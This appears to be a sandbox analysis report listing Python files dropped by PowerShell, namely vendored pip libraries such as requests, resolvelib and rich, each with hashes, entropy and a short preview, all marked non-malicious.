                                                                                                    Preview:r""".The ``codes`` object defines a mapping from common names for HTTP statuses.to their numerical codes, accessible either as attributes or as dictionary.items...Example::.. >>> import requests. >>> requests.codes['temporary_redirect']. 307. >>> requests.codes.teapot. 418. >>> requests.codes['\o/']. 200..Some codes have multiple names, and both upper- and lower-case versions of.the names are allowed. For example, ``codes.ok``, ``codes.OK``, and.``codes.okay`` all correspond to the HTTP status code 200.."""..from .structures import LookupDict.._codes = {. # Informational.. 100: ("continue",),. 101: ("switching_protocols",),. 102: ("processing",),. 103: ("checkpoint",),. 122: ("uri_too_long", "request_uri_too_long"),. 200: ("ok", "okay", "all_ok", "all_okay", "all_good", "\\o/", "."),. 201: ("created",),. 202: ("accepted",),. 203: ("non_authoritative_info", "non_authoritative_information"),. 204: ("no_content",),. 205: ("reset_c
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2912
                                                                                                    Entropy (8bit):4.67487833368712
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:HtJ0fhf5XObXK0YuIG9n6QeHMl5uWG5gRMz2vKvUgNjmTXr2LpC5pSjF/zfrm:NJgabXX+HaIWqiqUgwg0LEF//m
                                                                                                    MD5:077948910AE6FB44DC6E58D3D25D6AEE
                                                                                                    SHA1:B5C2C740B9FF7D27A83AC4C80E3AE741AA33B5BE
                                                                                                    SHA-256:F886E6855CF4E92FB968F499B94B6167AFBA0FD5CE8D1B935C739A6D8D38D573
                                                                                                    SHA-512:B9256700252D4330095253FF3ABAA885CC97967AAFB39EEB6720DB90AD55F6A9E70D925CDF0B77CA15E9DED6FAAB571EE2660FD2FDBA038DAD3247798FC22BC0
                                                                                                    Malicious:false
                                                                                                    Preview:""".requests.structures.~~~~~~~~~~~~~~~~~~~..Data structures that power Requests.."""..from collections import OrderedDict..from .compat import Mapping, MutableMapping...class CaseInsensitiveDict(MutableMapping):. """A case-insensitive ``dict``-like object... Implements all methods and operations of. ``MutableMapping`` as well as dict's ``copy``. Also. provides ``lower_items``... All keys are expected to be strings. The structure remembers the. case of the last key to be set, and ``iter(instance)``,. ``keys()``, ``items()``, ``iterkeys()``, and ``iteritems()``. will contain case-sensitive keys. However, querying and contains. testing is case insensitive::.. cid = CaseInsensitiveDict(). cid['Accept'] = 'application/json'. cid['aCCEPT'] == 'application/json' # True. list(cid) == ['Accept'] # True.. For example, ``headers['content-encoding']`` will return the. value of a ``'Content-Encoding'`` response header, regardless. o
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33460
                                                                                                    Entropy (8bit):4.612325222320672
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:ygGfemtN5Pvl1eW4JvaQO9rIdGio5Z9cS+uZ0qqMvEg:ygGWmtN5F1ebaDydGi8Z9cS56qqgEg
                                                                                                    MD5:B01AEBBE803AE5DCC4EEE669D0999734
                                                                                                    SHA1:AB32BBF7F7C53C36839CF134DF931794CD80464D
                                                                                                    SHA-256:90E3E7D2A603EB1453CDAC5BA937588922270591E5EB7EFD009B32220CD818B6
                                                                                                    SHA-512:37D3B0BD23645B5D15326775C246F8EF0644967959F6E6E6CC92412B40202DA0FE30EE3D100E492C496A69589E9EB8F60F66D2069BE2344AAB4A0D729BA0EA7D
                                                                                                    Malicious:false
                                                                                                    Preview:""".requests.utils.~~~~~~~~~~~~~~..This module provides utility functions that are used within Requests.that are also useful for external consumption.."""..import codecs.import contextlib.import io.import os.import re.import socket.import struct.import sys.import tempfile.import warnings.import zipfile.from collections import OrderedDict..from pip._vendor.urllib3.util import make_headers, parse_url..from . import certs.from .__version__ import __version__..# to_native_string is unused here, but imported here for backwards compatibility.from ._internal_utils import ( # noqa: F401. _HEADER_VALIDATORS_BYTE,. _HEADER_VALIDATORS_STR,. HEADER_VALIDATORS,. to_native_string,.).from .compat import (. Mapping,. basestring,. bytes,. getproxies,. getproxies_environment,. integer_types,.).from .compat import parse_http_list as _parse_list_header.from .compat import (. proxy_bypass,. proxy_bypass_environment,. quote,. str,. unquote,. urlparse,. url
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):537
                                                                                                    Entropy (8bit):4.510321812162615
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:UFc7jOOxY0fZR5RAZ7edTe5/fpxfNQifG6RB7Js7F:5j3vP1d0GUls7F
                                                                                                    MD5:8B67527EBDE2B292D95BFE62FF92897F
                                                                                                    SHA1:C756151B98834A600DAF027ED3E9AC9C12A15F6F
                                                                                                    SHA-256:879D3D4DD11CA5BE7EE382689DA5377B1D93335E465412E333D08D08FC274D3B
                                                                                                    SHA-512:EC0F64873CDD2BE43515ACE09A72C575B4DD2516DC5F9839686912A70F69DA5009DC5B04BA5300DDEBA3B739C5234EEA98C43AF1408218B3BA7492F420D3D124
                                                                                                    Malicious:false
                                                                                                    Preview:__all__ = [. "__version__",. "AbstractProvider",. "AbstractResolver",. "BaseReporter",. "InconsistentCandidate",. "Resolver",. "RequirementsConflicted",. "ResolutionError",. "ResolutionImpossible",. "ResolutionTooDeep",.]..__version__ = "1.0.1"...from .providers import AbstractProvider, AbstractResolver.from .reporters import BaseReporter.from .resolvers import (. InconsistentCandidate,. RequirementsConflicted,. ResolutionError,. ResolutionImpossible,. ResolutionTooDeep,. Resolver,.).
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):645
                                                                                                    Entropy (8bit):5.292755069084128
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:d2zlyjX/J7BOfLjRdC+Jq+b8J/PhlJF087eRcImaAEjaZxJcV:wh0/JCLhk+b8JnhlJW8H3jZgV
                                                                                                    MD5:ED0EC7032C21688BAD1633108886FE5E
                                                                                                    SHA1:91124289493124E79991C897DFCCC9242578C9B1
                                                                                                    SHA-256:5D468036FAA7340A5B6FDDFA26B8260B368C82B9FE2981F9EF417DE99EB5865B
                                                                                                    SHA-512:E05B510AC1E88BA1228BAD970D40F80BE5966F18E17F2712E3349C32D7ABD859225C26DF8F2D1F1C194FC06EE74361763DE1BA835EA75FC0021BF18D3C0BE621
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................L.....g.d...Z.d.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...y.).)...__version__..AbstractProvider..AbstractResolver..BaseReporter..InconsistentCandidate..Resolver..RequirementsConflicted..ResolutionError..ResolutionImpossible..ResolutionTooDeepz.1.0.1.....).r....r....).r....).r....r....r....r....r....r....N)...__all__r......providersr....r......reportersr......resolversr....r....r....r....r....r............kC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/resolvelib/__init__.py..<module>r........s*..........................:..#...............r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6862
                                                                                                    Entropy (8bit):4.819245635480394
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:zfoOHatQOvKX4APafN5n0vBWUQmOCfQNJHjsPyihCO8NcReY4tO7exrcn+eBDQP6:roGWrEzQWYJDsZwOleJuDghDtFSE25
                                                                                                    MD5:CB4E72E32CC3EFE4B71DDCB2C9A04F98
                                                                                                    SHA1:4EC1CD49003F42A799BC097174D3B4B0B83232A2
                                                                                                    SHA-256:CA5CD996909EA45D58C999FC121A665FAE27C57DCEFDC37EDC2B4A98A7A12789
                                                                                                    SHA-512:543A600F951CDADE2629B8C2E6364569B203C5FE6B8CB927C41DA32C169703FC0F75501C54AC32AD6E6E76AAB596C4955A6722859C1D24F2D619EF1B1C456693
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................0.......G.d...d.e.........Z...G.d...d.e.........Z.y.).c...........................e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...AbstractProviderzBDelegate class to provide the required interface for the resolver.c...........................t...........).z.Given a requirement, return an identifier for it... This is used to identify a requirement, e.g. whether two requirements. should have their specifier parts merged.. ....NotImplementedError)...self..requirement_or_candidates.... .lC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/resolvelib/providers.py..identifyz.AbstractProvider.identify..............."..!.....c...........................t...........).a....Produce a sort key for given requirement based on preference... The preference is defined as "I think this requirement should be. resolved first". The lower the return value is, the more preferred. this group of ar
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2665
                                                                                                    Entropy (8bit):4.956098435356268
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:KLr2wd4FtjKm0OUzoQJOZv4kBo8RFigz3NhEENSs45:KD6V0bivRBV2gz3NeEN8
                                                                                                    MD5:7BBA174DCB9DC888AB7103911C43DC49
                                                                                                    SHA1:3379B2B4BA5BBF179F5D91E93130A63C4985F03D
                                                                                                    SHA-256:64B9FADF5DC5B0956BB9C269F057CD9C196A860B64C35281829434B013CFD820
                                                                                                    SHA-512:59B42938224DA65F6C70BF0998DFC5F58EFC582BC7B424DE9BC071F79C82C69B89F1CCD97B5D1B05508D1B6D32C106B8BA4738400E8D96C411C0FF87FE33152E
                                                                                                    Malicious:false
                                                                                                    Preview:........=.CfA.................................G.d...d.e.........Z.y.).c.....................@.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...BaseReporterz?Delegate class to provider progress reporting for the resolver.c...........................y.).z-Called before the resolution actually starts.N..)...selfs.... .lC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/resolvelib/reporters.py..startingz.BaseReporter.starting................c...........................y.).zYCalled before each round of resolution starts... The index is zero-based.. Nr....).r......indexs.... r......starting_roundz.BaseReporter.starting_round....r....r....c...........................y.).z.Called before each round of resolution ends... This is NOT called if the resolution ends at this round. Use `ending`. if you want to report finalization. The index is zero-based.. Nr....).r....r......states.... r......ending_roundz.B
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):25908
                                                                                                    Entropy (8bit):5.184030788842961
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:cbxvvBc/BneLFroK7UbqsKhQ/u+U5B5cEaBkeG0qD9dkLGfu+ua2l:c1vJUeL9T7Ubq5LYqSsmy9C
                                                                                                    MD5:2663A9FB7F350F33614228DDC6F516EB
                                                                                                    SHA1:2B463B4FB2DC5281CE018B641C80A8E57CC49E69
                                                                                                    SHA-256:D9AFDC95E3009FC33F7A30C40C94A1F6868A91FD1C44CD69EAD7A65DF07D108B
                                                                                                    SHA-512:F116FA014CB936D3D8E97065674AA1D695B09389E0D1EDF663EDFD78FC5B08C8F404FF7D9E92BC82998F43F7E51589851C3BC7F03CB35F2D649798F945C75216
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.P.............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.....e.j...................d.d.d.g.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...e.j...................d.d.........Z...G.d...d.e.........Z.d...Z...e.j...................d.d.........Z.d...Z...G.d...d.e.........Z.y.) .....N.....)...AbstractResolver)...DirectedGraph..IteratorMapping..build_iter_view..RequirementInformation..requirement..parentc...........................e.Z.d.Z.d.Z.y.)...ResolverExceptionz.A base class for all exceptions raised by this module... Exceptions derived by this class should all be handled in this module. Any. bubbling pass the resolver should be treated as a bug.. N)...__name__..__module__..__qualname__..__doc__........lC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/resolvelib/resolvers.pyr....r.......
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10517
                                                                                                    Entropy (8bit):4.870610510433197
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:AUwaLWl2u6qM0la/5YITi9aZojOo6vG1iyO7KQgJeiMbdb0Ix:AUwKWl2u6qM0la/5PTq1iy+KE5j
                                                                                                    MD5:B9DA17AE3BD2107D0EB779DAA89E340C
                                                                                                    SHA1:274ACDA8C1D00737FE7CAD5FAFC86CAA54A2DE34
                                                                                                    SHA-256:A0DFE290FADA227CCAFA8BE3508CFAF0B862BC01052F405DA7BE631E3C7334F8
                                                                                                    SHA-512:7DD5E6AFD5D592EF97A4EB5BCCD9F95B22B6546AE2C7CDC267C6FC4D7E2546A2FC61DB5D39730B2708B4D0E3A7293704E1E041F5383BC7817E2AEA5F7553EDA1
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cfc..............................d.d.l.Z.d.d.l.m.Z.....G.d...d.e.........Z...G.d...d.e.j...........................Z...G.d...d.e.........Z...G.d...d.e.........Z.d...Z.y.)......N.....)...collections_abcc.....................X.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...DirectedGraphz&A graph structure with directed edges.c.....................>.....t.................|._.........i.|._.........i.|._.........y...N)...set.._vertices.._forwards.._backwards....selfs.... .jC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/resolvelib/structs.py..__init__z.DirectedGraph.__init__....s..................................c.....................,.....t.........|.j...........................S.r....)...iterr....r....s.... r......__iter__z.DirectedGraph.__iter__...............D.N.N..#..#r....c.....................,.....t.........|.j...........................S.r....)...lenr....r....s.... r......__len__z.Directe
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):211
                                                                                                    Entropy (8bit):4.825520296061141
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:ow9l/clllVO8l40P/vh4E2J51X6rSUiVWrzLUhKBHKd2IUcRwIaQHtgem/l:rH/cl/Vne4n23d6oAreaAB6Iaatgem/l
                                                                                                    MD5:3491C805395E114B5B6FF52600784852
                                                                                                    SHA1:0B7BFEC6629458AAAA12570664FC121FCFE4573D
                                                                                                    SHA-256:CAF78553F991BFF2ADDD82A646F2F63417FACEA7F9B9771EA40B10FDF8FAEC9E
                                                                                                    SHA-512:4BFA79FE7D4F60E216315CBE8B10E1F2EED1691F4CFFCC2393CE42B043FA5EB682AA009E9F5AAC1436439E76126DF45C4CCF4189EFE9C16A69FA9B7D5FC9F24A
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................y.).N..r..........rC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/resolvelib/compat/__init__.py..<module>r........s.........r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):431
                                                                                                    Entropy (8bit):5.499301361566097
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:lCfkLVJT3PJsXPZSImaAPayleuk1rCHQ5Yyn:08LVhPmc3y2eu8d
                                                                                                    MD5:F68087A0B84C2DD71921C4789C89ECE0
                                                                                                    SHA1:3112F949872B90DE985DE8DB40537C70B42C189E
                                                                                                    SHA-256:D2E6245D49FCA0CE4ADAD6EBBD10B9D61478331ACDF4BDB6F716EADBF82C1865
                                                                                                    SHA-512:288C7755D959837D38CF8E666FA716EB8B4762510A39269B3DEC17D1E3D788837C18C37AC1EEC3A3A66AB0CB249AE80FA7037090CE1F441DCDF7DAA4BB277BA7
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................D.....d.d.g.Z...d.d.l.m.Z.m.Z...y.#.e.$.r...d.d.l.m.Z.m.Z...Y.y.w.x.Y.w.)...Mapping..Sequence.....).r....r....N)...__all__..collections.abcr....r......ImportError..collections........yC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/resolvelib/compat/collections_abc.py..<module>r........s/............j..!.........1..1...........-..-......s................
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):156
                                                                                                    Entropy (8bit):4.553911096832729
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:UFo+HoEdHODTXKuADY0LukIEMsILXwN5XKuANMXB0Luk/:UJovyEyIvpLXwuIBy/
                                                                                                    MD5:8CCCA9124787135195D14416CE79902C
                                                                                                    SHA1:707DC63C9B0961B36CC1127216AF38DE6B1B31E7
                                                                                                    SHA-256:BB2F31519F8D0C4C3DD7AB6E8145E6F0783008688C3B47FE45C767A647D77CEB
                                                                                                    SHA-512:2F5EA29E328C16AD440198F3711EC8A6E6CC413C22C297E34370A77F4C373031A071DCC62929E092BF0ABED5930A68A5C42D2FD0788DC6BD98841199201C7764
                                                                                                    Malicious:false
                                                                                                    Preview:__all__ = ["Mapping", "Sequence"]..try:. from collections.abc import Mapping, Sequence.except ImportError:. from collections import Mapping, Sequence.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5871
                                                                                                    Entropy (8bit):4.2712977964138785
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:0wMwxa+DBKX4APafN5n0vBWUQmOCfQN/EqaihCO8NcReY4tO7exrcnfq+wgDQPHK:0YrEzQWYcq5wOlep+DgxQRz
                                                                                                    MD5:665E6250C74F4CE90B856FB8BB4DD6EA
                                                                                                    SHA1:D4753F2CE0F84B8ECE6709862CA9C5859D391A70
                                                                                                    SHA-256:7EEBAF56B09EB6EE60B313C1E37111CA37CEF1A45E4B7AC5407A4382222D6ECE
                                                                                                    SHA-512:30DDDA3174429AA2C10D5FF137CE9C3645C7A9F177E2B23A0B3320935E0C03822492ED3DDD6F3D153D34970FAD1CD526176796ECA12E63E403FD79062ABF6DC0
                                                                                                    Malicious:false
                                                                                                    Preview:class AbstractProvider(object):. """Delegate class to provide the required interface for the resolver.""".. def identify(self, requirement_or_candidate):. """Given a requirement, return an identifier for it... This is used to identify a requirement, e.g. whether two requirements. should have their specifier parts merged.. """. raise NotImplementedError.. def get_preference(. self,. identifier,. resolutions,. candidates,. information,. backtrack_causes,. ):. """Produce a sort key for given requirement based on preference... The preference is defined as "I think this requirement should be. resolved first". The lower the return value is, the more preferred. this group of arguments is... :param identifier: An identifier as returned by ``identify()``. This. identifies the dependency matches which should be returned.. :param resolutions: Mapping of can
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1601
                                                                                                    Entropy (8bit):4.330519926970746
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:MJdtvFSaYuaTwKEq3tlYw1oHmM3TOUz7s2Ao24Zd4xgC1LwHoYwnqmK:IdZhKx1Om0OUzNXv4gwLwHoYwnhK
                                                                                                    MD5:5BF3F0BF3D4F94B0339E60D4D4766447
                                                                                                    SHA1:12FB5DB25D45218AF1EDF7A377251B2C5E493BE5
                                                                                                    SHA-256:4D26D1996CD3736EB0D2082C5756F15697960C1F10348ADEEADC1897B1886411
                                                                                                    SHA-512:66656422F188AAC638AEA78769F2FD9B51588024A883DFE3B3873B094317C1AC68FD93DE2FDBE856D4B53C7E0703195BD16F0B36FA49EA6789CE7A5048A955AD
                                                                                                    Malicious:false
                                                                                                    Preview:class BaseReporter(object):. """Delegate class to provider progress reporting for the resolver.""".. def starting(self):. """Called before the resolution actually starts.""".. def starting_round(self, index):. """Called before each round of resolution starts... The index is zero-based.. """.. def ending_round(self, index, state):. """Called before each round of resolution ends... This is NOT called if the resolution ends at this round. Use `ending`. if you want to report finalization. The index is zero-based.. """.. def ending(self, state):. """Called before the resolution ends successfully.""".. def adding_requirement(self, requirement, parent):. """Called when adding a new requirement into the resolve criteria... :param requirement: The additional requirement to be applied to filter. the available candidaites.. :param parent: The candidate that requires ``requirement`` as
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20511
                                                                                                    Entropy (8bit):4.178230099897123
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:5C5jw+mgruh4Hp5+OuzZ7B+vM7sL6A1Z3kIvqs2GSdsLci5zD9dkLGfygmx:8pwFERg7B+UGXZZD9dkLGf8x
                                                                                                    MD5:638769280AA3660D6C298202B1A75A61
                                                                                                    SHA1:81C58B0F42E795A41A832E6EDCB0EF3A8667AF3E
                                                                                                    SHA-256:1BCAEC2D94AAEB883956622AFA507B51C209D608C0C48409993178444665790D
                                                                                                    SHA-512:A610F35824D6FA5394283C618141AE3DF4241231FB4768C0A1381E9323D69886934C5CDD87C236846EC62BC7E2780A0F868F2A81BB39042D25D0FE8410DAB8E7
                                                                                                    Malicious:false
                                                                                                    Preview:import collections.import itertools.import operator..from .providers import AbstractResolver.from .structs import DirectedGraph, IteratorMapping, build_iter_view..RequirementInformation = collections.namedtuple(. "RequirementInformation", ["requirement", "parent"].)...class ResolverException(Exception):. """A base class for all exceptions raised by this module... Exceptions derived by this class should all be handled in this module. Any. bubbling pass the resolver should be treated as a bug.. """...class RequirementsConflicted(ResolverException):. def __init__(self, criterion):. super(RequirementsConflicted, self).__init__(criterion). self.criterion = criterion.. def __str__(self):. return "Requirements conflict: {}".format(. ", ".join(repr(r) for r in self.criterion.iter_requirement()),. )...class InconsistentCandidate(ResolverException):. def __init__(self, candidate, criterion):. super(InconsistentCandidate, self)
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4963
                                                                                                    Entropy (8bit):4.504287082118526
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:XMW5iwtA0USqyxkW48ZPSrhvWU6+wiiRWgOEyXSYCRj:j5iwtA9tP1qPGkOO/Rj
                                                                                                    MD5:1DE4B6FFAF2082A2C0AFE6BFDC947054
                                                                                                    SHA1:36DBFDD47591385CCD103148BD024F7A1E81C690
                                                                                                    SHA-256:D3FD7F5CEF33FC22E17A03F75697FD549DF325C7CB9B434E1D133E8B4624CF7A
                                                                                                    SHA-512:E7CC50FA1C2E0B11F103C8E365DCD4E4D0D06604F1A20585DDBA2D3EC8D1998338AA8877D041444FA62F39719A10748E05F73508B8285043F7413F9A29A39439
                                                                                                    Malicious:false
                                                                                                    Preview:import itertools..from .compat import collections_abc...class DirectedGraph(object):. """A graph structure with directed edges.""".. def __init__(self):. self._vertices = set(). self._forwards = {} # <key> -> Set[<key>]. self._backwards = {} # <key> -> Set[<key>].. def __iter__(self):. return iter(self._vertices).. def __len__(self):. return len(self._vertices).. def __contains__(self, key):. return key in self._vertices.. def copy(self):. """Return a shallow copy of this graph.""". other = DirectedGraph(). other._vertices = set(self._vertices). other._forwards = {k: set(v) for k, v in self._forwards.items()}. other._backwards = {k: set(v) for k, v in self._backwards.items()}. return other.. def add(self, key):. """Add a new vertex to the graph.""". if key in self._vertices:. raise ValueError("vertex exists"). self._vertices.add(key). self._f
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C++ source, ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6090
                                                                                                    Entropy (8bit):4.661592516678406
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:+dIiCAbXttlVARcUdFfldr7AwEA9vgfreyAF778rlS4HjCqgdzdvF41:UIiCAb7fARbdFfliA9vgTvuEJjCqgdz4
                                                                                                    MD5:F434655DDD93988A30786A6B71DDCD9C
                                                                                                    SHA1:D6B97FECE02385EFF2B7A6E2145299C171772C80
                                                                                                    SHA-256:751C6320BF926C5558D2ADC88D232B7E00531EB9B52D90E02CECA0541C226197
                                                                                                    SHA-512:44B4F1E9EAA6B6C8722B506C1412578607310CFCDE524BA47BA34227C026FA1C653A6B0D9BC5616DD01EDF7A1D5DC921ABD7568744D4C5AA111A67090ABFA709
                                                                                                    Malicious:false
                                                                                                    Preview:"""Rich text and beautiful formatting in the terminal."""..import os.from typing import IO, TYPE_CHECKING, Any, Callable, Optional, Union..from ._extension import load_ipython_extension # noqa: F401..__all__ = ["get_console", "reconfigure", "print", "inspect", "print_json"]..if TYPE_CHECKING:. from .console import Console..# Global console used by alternative print._console: Optional["Console"] = None..try:. _IMPORT_CWD = os.path.abspath(os.getcwd()).except FileNotFoundError:. # Can happen if the cwd has been deleted. _IMPORT_CWD = ""...def get_console() -> "Console":. """Get a global :class:`~rich.console.Console` instance. This function is used when Rich requires a Console,. and hasn't been explicitly given one... Returns:. Console: A console instance.. """. global _console. if _console is None:. from .console import Console.. _console = Console().. return _console...def reconfigure(*args: Any, **kwargs: Any) -> None:. """Reco
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8478
                                                                                                    Entropy (8bit):4.98505476739099
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:mXudIS2H0OF0u+g5dZrQHy/YJtn4KcSIcKiJGOZzbarmp3shirjr/NQYN7:mXuyS2UOeu+gA0KcSIcKjODp3shirjrZ
                                                                                                    MD5:743F8BB0D6C8516E67B36E125FD398C0
                                                                                                    SHA1:81633B6E9D2F763A3B26F71EB7BC2B8F4D1C46DB
                                                                                                    SHA-256:4D3F2C6FD3D39EC9CA861AC6B8790B3748DD37476D2A1B4F904AFD0A27436CF3
                                                                                                    SHA-512:3474085F161EBA39B061561D77D42B0509F8CF69C10044009D63D0E4DB4C9BCA2C252261A29975D08AE6D3BD3CF164E95378B0BAF58423E70395EAFECD820A1C
                                                                                                    Malicious:false
                                                                                                    Preview:import colorsys.import io.from time import process_time..from pip._vendor.rich import box.from pip._vendor.rich.color import Color.from pip._vendor.rich.console import Console, ConsoleOptions, Group, RenderableType, RenderResult.from pip._vendor.rich.markdown import Markdown.from pip._vendor.rich.measure import Measurement.from pip._vendor.rich.pretty import Pretty.from pip._vendor.rich.segment import Segment.from pip._vendor.rich.style import Style.from pip._vendor.rich.syntax import Syntax.from pip._vendor.rich.table import Table.from pip._vendor.rich.text import Text...class ColorBox:. def __rich_console__(. self, console: Console, options: ConsoleOptions. ) -> RenderResult:. for y in range(0, 5):. for x in range(options.max_width):. h = x / options.max_width. l = 0.1 + ((y / 5) * 0.7). r1, g1, b1 = colorsys.hls_to_rgb(h, l, 1.0). r2, g2, b2 = colorsys.hls_to_rgb(h, l + 0.7 / 10, 1.0).
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7026
                                                                                                    Entropy (8bit):5.631375479055603
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:GbIMVfzbXttloQ9/t5r8bibQdr7AwEA2OyAF77JS/R2S4HjCqgdRjL4bz5D:G9Lb7v9f8b5iA2/uMOjCqgdRjL4hD
                                                                                                    MD5:846FCC6A03E1E3DD4F1FC193461026CE
                                                                                                    SHA1:20BE23C8ED2E38529C2287B5549C7EA5A9495350
                                                                                                    SHA-256:3796CF00E3A0FEEFFBCC0AB90BE62AA960FD03B3C2AC395BC61ECA1BAAE54680
                                                                                                    SHA-512:CD8A7689953E6B0E18AFA14265C6C6176E4762D117CB5D577852CB5F8511307BE83C6B0D34E603BBA2D5F7D5FC876953E2B99297CE63FEFAFDF24822F4C2C150
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................U.d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...g.d...Z.e.r.d.d.l.m.Z...d.a.e.d.....e.d.<.....e.j ..................j#....................e.j$..................................Z.d7d...Z.d.e.d.e.d.d.f.d...Z.d.d.d.d.d...d.e.d.e.d.e.d.e.e.e.........d.e.d.d.f.d...Z...d8d.d.d.d.d.d.d.d.d.d...d.e.e.....d.e.d.e.d.e.e.f.....d e.d!e.d"e.d#e.d$e.d%e.e.e.g.e.f.........d&e.d.d.f.d'..Z.d.d.d.d.d.d.d.d.d.d.d(..d)e.d*e.d.....d+e.e.....d,e.d-e.d.e.d/e.d0e.d1e.d2e.d3e.d.d.f.d4..Z.e.d5k(..r...e.d6..........y.y.#.e.$.r...d.Z.Y...w.x.Y.w.)9z3Rich text and beautiful formatting in the terminal......N)...IO..TYPE_CHECKING..Any..Callable..Optional..Union.....)...load_ipython_extension)...get_console..reconfigure..print..inspect..print_json....Consoler......_console....returnc.....................4.....t...........d.d.l.m.}.....|.........a.t.........S.).z.Get a global :class:`~rich.console.Console` instance. This function is used when Rich requires a Consol
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
